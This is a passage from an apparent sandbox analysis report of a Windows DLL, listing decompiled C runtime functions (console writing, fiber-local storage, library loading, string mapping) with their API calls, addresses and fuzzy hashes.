				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x73231004; // 0xa57badb2
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x73231f50 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E7321514C( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x73231f50 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x73231750)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x73231f50 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x73231750)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x73231f50 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E73213C30( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x73231f50 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E7321A0CD(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E73216F05(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E73218214(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x73231f50 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x73231f50 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x73231f50 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E732180E1( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E732180E1();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E73212813(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}

0x732194a6
0x732194ad
0x732194b0
0x732194b5
0x732194bd
0x732194c0
0x732194c4
0x732194c7
0x732194d1
0x732194db
0x732194dd
0x732194e0
0x732194e3
0x732194e9
0x732194eb
0x732194f2
0x732194ff
0x73219500
0x73219503
0x73219506
0x73219507
0x73219508
0x7321950b
0x73219510
0x7321981c
0x7321981c
0x73219516
0x73219516
0x73219519
0x7321951b
0x73219521
0x73219524
0x7321952b
0x73219532
0x7321953b
0x00000000
0x00000000
0x73219541
0x73219547
0x73219549
0x7321954b
0x7321954e
0x73219553
0x73219557
0x00000000
0x00000000
0x00000000
0x73219557
0x7321955c
0x7321955f
0x73219561
0x73219566
0x73219618
0x73219619
0x7321961c
0x7321961e
0x732197cc
0x732197ce
0x00000000
0x732197d0
0x732197d0
0x732197d3
0x732197d6
0x732197df
0x732197e2
0x732197e3
0x732197e7
0x732197ea
0x732197ea
0x00000000
0x732197ee
0x73219624
0x73219624
0x73219629
0x7321962c
0x73219632
0x73219638
0x73219641
0x73219644
0x73219644
0x73219645
0x73219646
0x73219649
0x7321964a
0x00000000
0x7321964a
0x7321956c
0x7321957b
0x7321957c
0x7321957f
0x73219581
0x73219586
0x73219797
0x73219799
0x7321979b
0x7321979e
0x732197a3
0x732197ac
0x732197af
0x732197b0
0x732197b4
0x732197b7
0x732197ba
0x732197ba
0x732197be
0x732197be
0x732197be
0x732197c1
0x732197c1
0x732197c1
0x732197c3
0x732197c3
0x732197c7
0x7321958c
0x7321958c
0x73219590
0x73219592
0x73219595
0x73219598
0x7321959c
0x7321959d
0x732195a1
0x732195a1
0x732195a4
0x732195a9
0x732195b5
0x732195ba
0x732195bd
0x732195bd
0x732195c2
0x732195c4
0x732195c7
0x732195c9
0x732195cc
0x732195cf
0x732195d2
0x732195da
0x732195de
0x732195e2
0x732195e2
0x732195e8
0x732195ee
0x732195f1
0x732195f9
0x73219600
0x73219604
0x73219605
0x73219608
0x73219609
0x7321964d
0x7321964d
0x73219651
0x73219652
0x73219657
0x7321965d
0x00000000
0x73219663
0x73219667
0x732196f0
0x732196f7
0x732196ff
0x73219707
0x7321970c
0x7321970f
0x73219714
0x00000000
0x7321971a
0x7321972f
0x73219813
0x73219819
0x00000000
0x73219735
0x7321973e
0x73219740
0x73219746
0x00000000
0x7321974c
0x73219750
0x73219786
0x73219789
0x00000000
0x7321978f
0x7321978f
0x00000000
0x7321978f
0x73219752
0x73219754
0x73219756
0x7321976f
0x00000000
0x73219775
0x73219779
0x00000000
0x7321977f
0x7321977f
0x73219782
0x73219783
0x00000000
0x73219783
0x73219779
0x7321976f
0x73219750
0x73219746
0x7321972f
0x73219714
0x7321965d
0x73219586
0x00000000
0x7321966e
0x7321966e
0x73219671
0x73219675
0x73219678
0x7321969a
0x7321969d
0x732196a2
0x732196a6
0x732196aa
0x732196d8
0x732196da
0x00000000
0x732196ac
0x732196ac
0x732196af
0x732196b2
0x732196b5
0x732197f0
0x732197f3
0x732197f6
0x73219800
0x7321980b
0x73219810
0x00000000
0x732196bb
0x732196c2
0x732196c7
0x732196ca
0x732196cd
0x00000000
0x732196d3
0x732196d3
0x00000000
0x732196d3
0x732196cd
0x732196b5
0x7321967a
0x7321967e
0x73219681
0x73219686
0x7321968c
0x7321968e
0x73219695
0x732196db
0x732196de
0x732196df
0x732196e4
0x732196e7
0x732196ea
0x00000000
0x00000000
0x00000000
0x00000000
0x732196ea
0x00000000
0x73219678
0x73219519
0x7321981f
0x7321981f
0x73219821
0x73219824
0x73219824
0x73219824
0x73219824
0x73219836
0x73219838
0x73219839
0x7321983a
0x73219846

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 732194E3
__fassign.LIBCMT ref: 732196C2
__fassign.LIBCMT ref: 732196DF
WriteFile.KERNEL32(?,73217C8E,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 73219727
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 73219767
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 73219813

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 5884fb64bc49c1943b9e72aa90f74684f6ded8305bff7ac17ab787e574cc3d07
Instruction ID: cf0607fb07045572ae80f15b5dd2fe259bd339c4b469910fa539407b5585d66c
Opcode Fuzzy Hash: 5884fb64bc49c1943b9e72aa90f74684f6ded8305bff7ac17ab787e574cc3d07
Instruction Fuzzy Hash: 3DD19371D0025A9FDF11CFA8CA80AEDBBF6EF49310F284169E416B7245D730A996CF90

Uniqueness

Uniqueness Score: -1.00%

Function 73213AA7, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E73213AA7(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x73231020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E732142FD(_t13, __eflags,  *0x73231020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E73214338(_t14, __eflags,  *0x73231020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E73215278();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E73214338(_t18, __eflags,  *0x73231020, 0);
								} else {
									_t8 = E73214338(_t18, __eflags,  *0x73231020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E73215091(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x73213aa7
0x73213aae
0x73213ac1
0x73213ac8
0x73213aca
0x73213acb
0x73213ace
0x73213ae7
0x73213ae7
0x73213ad0
0x73213ad0
0x73213ad2
0x73213adc
0x73213ae3
0x73213ae5
0x73213aec
0x73213af5
0x73213af8
0x73213af9
0x73213afb
0x73213b0f
0x73213b0f
0x73213b18
0x73213afd
0x73213b04
0x73213b0a
0x73213b0b
0x73213b0d
0x73213b21
0x73213b23
0x73213b23
0x00000000
0x00000000
0x00000000
0x73213b0d
0x73213b26
0x00000000
0x00000000
0x00000000
0x73213ae5
0x73213ad2
0x73213b2e
0x73213b38
0x73213ab0
0x73213ab2
0x73213ab2

APIs

GetLastError.KERNEL32(00000001,?,73213615,73212E33,7321284C,?,73212A84,?,00000001,?,?,00000001,?,7322FAB8,0000000C,73212B7D), ref: 73213AB5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 73213AC3
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 73213ADC
SetLastError.KERNEL32(00000000,73212A84,?,00000001,?,?,00000001,?,7322FAB8,0000000C,73212B7D,?,00000001,?), ref: 73213B2E

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 950cfecbf76865e8294f5f34e1245bd23e80159d0c71b808e42030fbae23100c
Instruction ID: c1aae5d6927e37aa150e91ba00e8f818234a83665b1c36135bf4b99c83bed246
Opcode Fuzzy Hash: 950cfecbf76865e8294f5f34e1245bd23e80159d0c71b808e42030fbae23100c
Instruction Fuzzy Hash: 4F01D83361C3135FE21925B69F88BAB2AFAEB456B43300339E619410D4FF9358E26140

Uniqueness

Uniqueness Score: -1.00%

Function 73216479, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73216479(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E73216F05(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E73216F05(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E73215B5D(GetLastError());
									_t17 =  *((intOrPtr*)(E73215B93(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E73216540(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E73215B5D(GetLastError());
						_t17 =  *((intOrPtr*)(E73215B93(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E73216540(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E73216567(_a8);
				return 0;
			}

0x7321647f
0x73216484
0x73216498
0x7321649b
0x732164cd
0x732164d5
0x732164d7
0x732164f0
0x732164f3
0x732164f6
0x73216504
0x73216513
0x7321651b
0x7321651d
0x73216536
0x73216539
0x73216539
0x7321651f
0x73216526
0x73216531
0x73216531
0x7321653b
0x7321653c
0x00000000
0x7321653c
0x732164fb
0x73216500
0x73216502
0x00000000
0x00000000
0x00000000
0x73216502
0x732164e0
0x732164eb
0x00000000
0x732164eb
0x7321649d
0x732164a0
0x732164a3
0x732164b6
0x732164b9
0x732164bb
0x732164bd
0x00000000
0x732164bd
0x732164a9
0x732164ae
0x732164b0
0x00000000
0x00000000
0x00000000
0x732164b0
0x73216489
0x00000000

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 7321647E

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 659cf40166d1e357246833b9b4e1785fa207a2fa20f042e01d4ea91c1754c509
Instruction ID: 901006176b21993a4bf54c070fb12fe8298ecce06c3476075cc0262e18240bb0
Opcode Fuzzy Hash: 659cf40166d1e357246833b9b4e1785fa207a2fa20f042e01d4ea91c1754c509
Instruction Fuzzy Hash: F821C5B1600207BFE7119F659E40F1F77EEAF003647144554ED2997188E770EDA087A4

Uniqueness

Uniqueness Score: -1.00%

Function 732141A4, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E732141A4(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x73231c68 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x7321daf0 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E73215283(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x732141ab
0x7321421f
0x732141b0
0x732141b2
0x732141b9
0x732141bd
0x732141c6
0x732141d5
0x732141de
0x732141e2
0x7321422b
0x7321422d
0x73214231
0x73214234
0x73214234
0x7321423a
0x7321423a
0x73214226
0x7321422a
0x7321422a
0x732141e4
0x732141ed
0x73214217
0x7321421a
0x7321421c
0x7321421c
0x00000000
0x7321421c
0x732141ef
0x732141fa
0x732141ff
0x73214204
0x00000000
0x00000000
0x7321420b
0x73214211
0x73214215
0x00000000
0x00000000
0x00000000
0x73214215
0x732141c2
0x00000000
0x00000000
0x00000000
0x732141c4
0x73214224
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,73214265,00000000,?,00000001,00000000,?,732142DC,00000001,FlsFree,7321DBAC,FlsFree,00000000), ref: 73214234

Strings

api-ms-, xrefs: 732141F4

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 2c1d4537689a47b2db2e79922ff8140460c93983694a2483deaaface76471e28
Instruction ID: 47e3b314d9ac0ebc8e191146c52a869404a89b72903b057714125bc4239232b0
Opcode Fuzzy Hash: 2c1d4537689a47b2db2e79922ff8140460c93983694a2483deaaface76471e28
Instruction Fuzzy Hash: F711E733E40233DBC7139A699E44B5977F8AB01B60F250220E91EEB2C0E774E99086D0

Uniqueness

Uniqueness Score: -1.00%

Function 73218D3B, Relevance: 7.7, APIs: 5, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E73218D3B(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x73231004; // 0xa57badb2
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E7321A46C(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E73216E89(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E73212813(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E73218D1B(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E73216E89(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E7321760D(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E7321760D(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E73218D1B(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E73216F05();
									if(_t95 != 0) {
										E73218D1B(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E73217F4F(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E7321C670(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E7321760D(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E73217F4F(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E7321C670(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x73218d40
0x73218d41
0x73218d42
0x73218d49
0x73218d4e
0x73218d54
0x73218d5a
0x73218d60
0x73218d63
0x73218d63
0x73218d66
0x73218d68
0x73218d68
0x73218d66
0x73218d6a
0x73218d6f
0x73218d76
0x73218d79
0x73218d79
0x73218d9a
0x73218d9c
0x73218d9f
0x73218da4
0x73218f02
0x73218f05
0x73218f06
0x73218f07
0x73218f15
0x73218daa
0x73218dad
0x73218db2
0x73218db4
0x73218db6
0x73218ded
0x73218def
0x73218df1
0x73218ef7
0x73218ef7
0x73218ef9
0x73218efa
0x73218f00
0x00000000
0x73218f00
0x73218e00
0x73218e05
0x73218e0a
0x00000000
0x00000000
0x73218e10
0x73218e27
0x73218e2b
0x00000000
0x00000000
0x73218e31
0x73218e39
0x73218e76
0x73218e7b
0x73218e7d
0x73218e7f
0x73218eb0
0x73218eb2
0x73218eb4
0x73218ef0
0x73218ef1
0x00000000
0x73218ed1
0x73218ed3
0x73218ed4
0x73218ed8
0x73218f16
0x73218f19
0x73218eda
0x73218eda
0x73218edb
0x73218edb
0x73218edc
0x73218edd
0x73218ede
0x73218edf
0x73218ee7
0x73218eee
0x73218f1f
0x00000000
0x00000000
0x00000000
0x00000000
0x73218eee
0x73218eb4
0x73218e83
0x73218e9e
0x73218ea3
0x00000000
0x00000000
0x73218ea5
0x73218eab
0x73218eab
0x00000000
0x73218eab
0x73218e85
0x73218e8a
0x73218e8e
0x00000000
0x00000000
0x73218e90
0x00000000
0x73218e90
0x73218e3b
0x73218e40
0x00000000
0x00000000
0x73218e48
0x00000000
0x00000000
0x73218e64
0x73218e68
0x00000000
0x00000000
0x00000000
0x73218e6e
0x73218dbd
0x73218dd8
0x73218ddd
0x73218de8
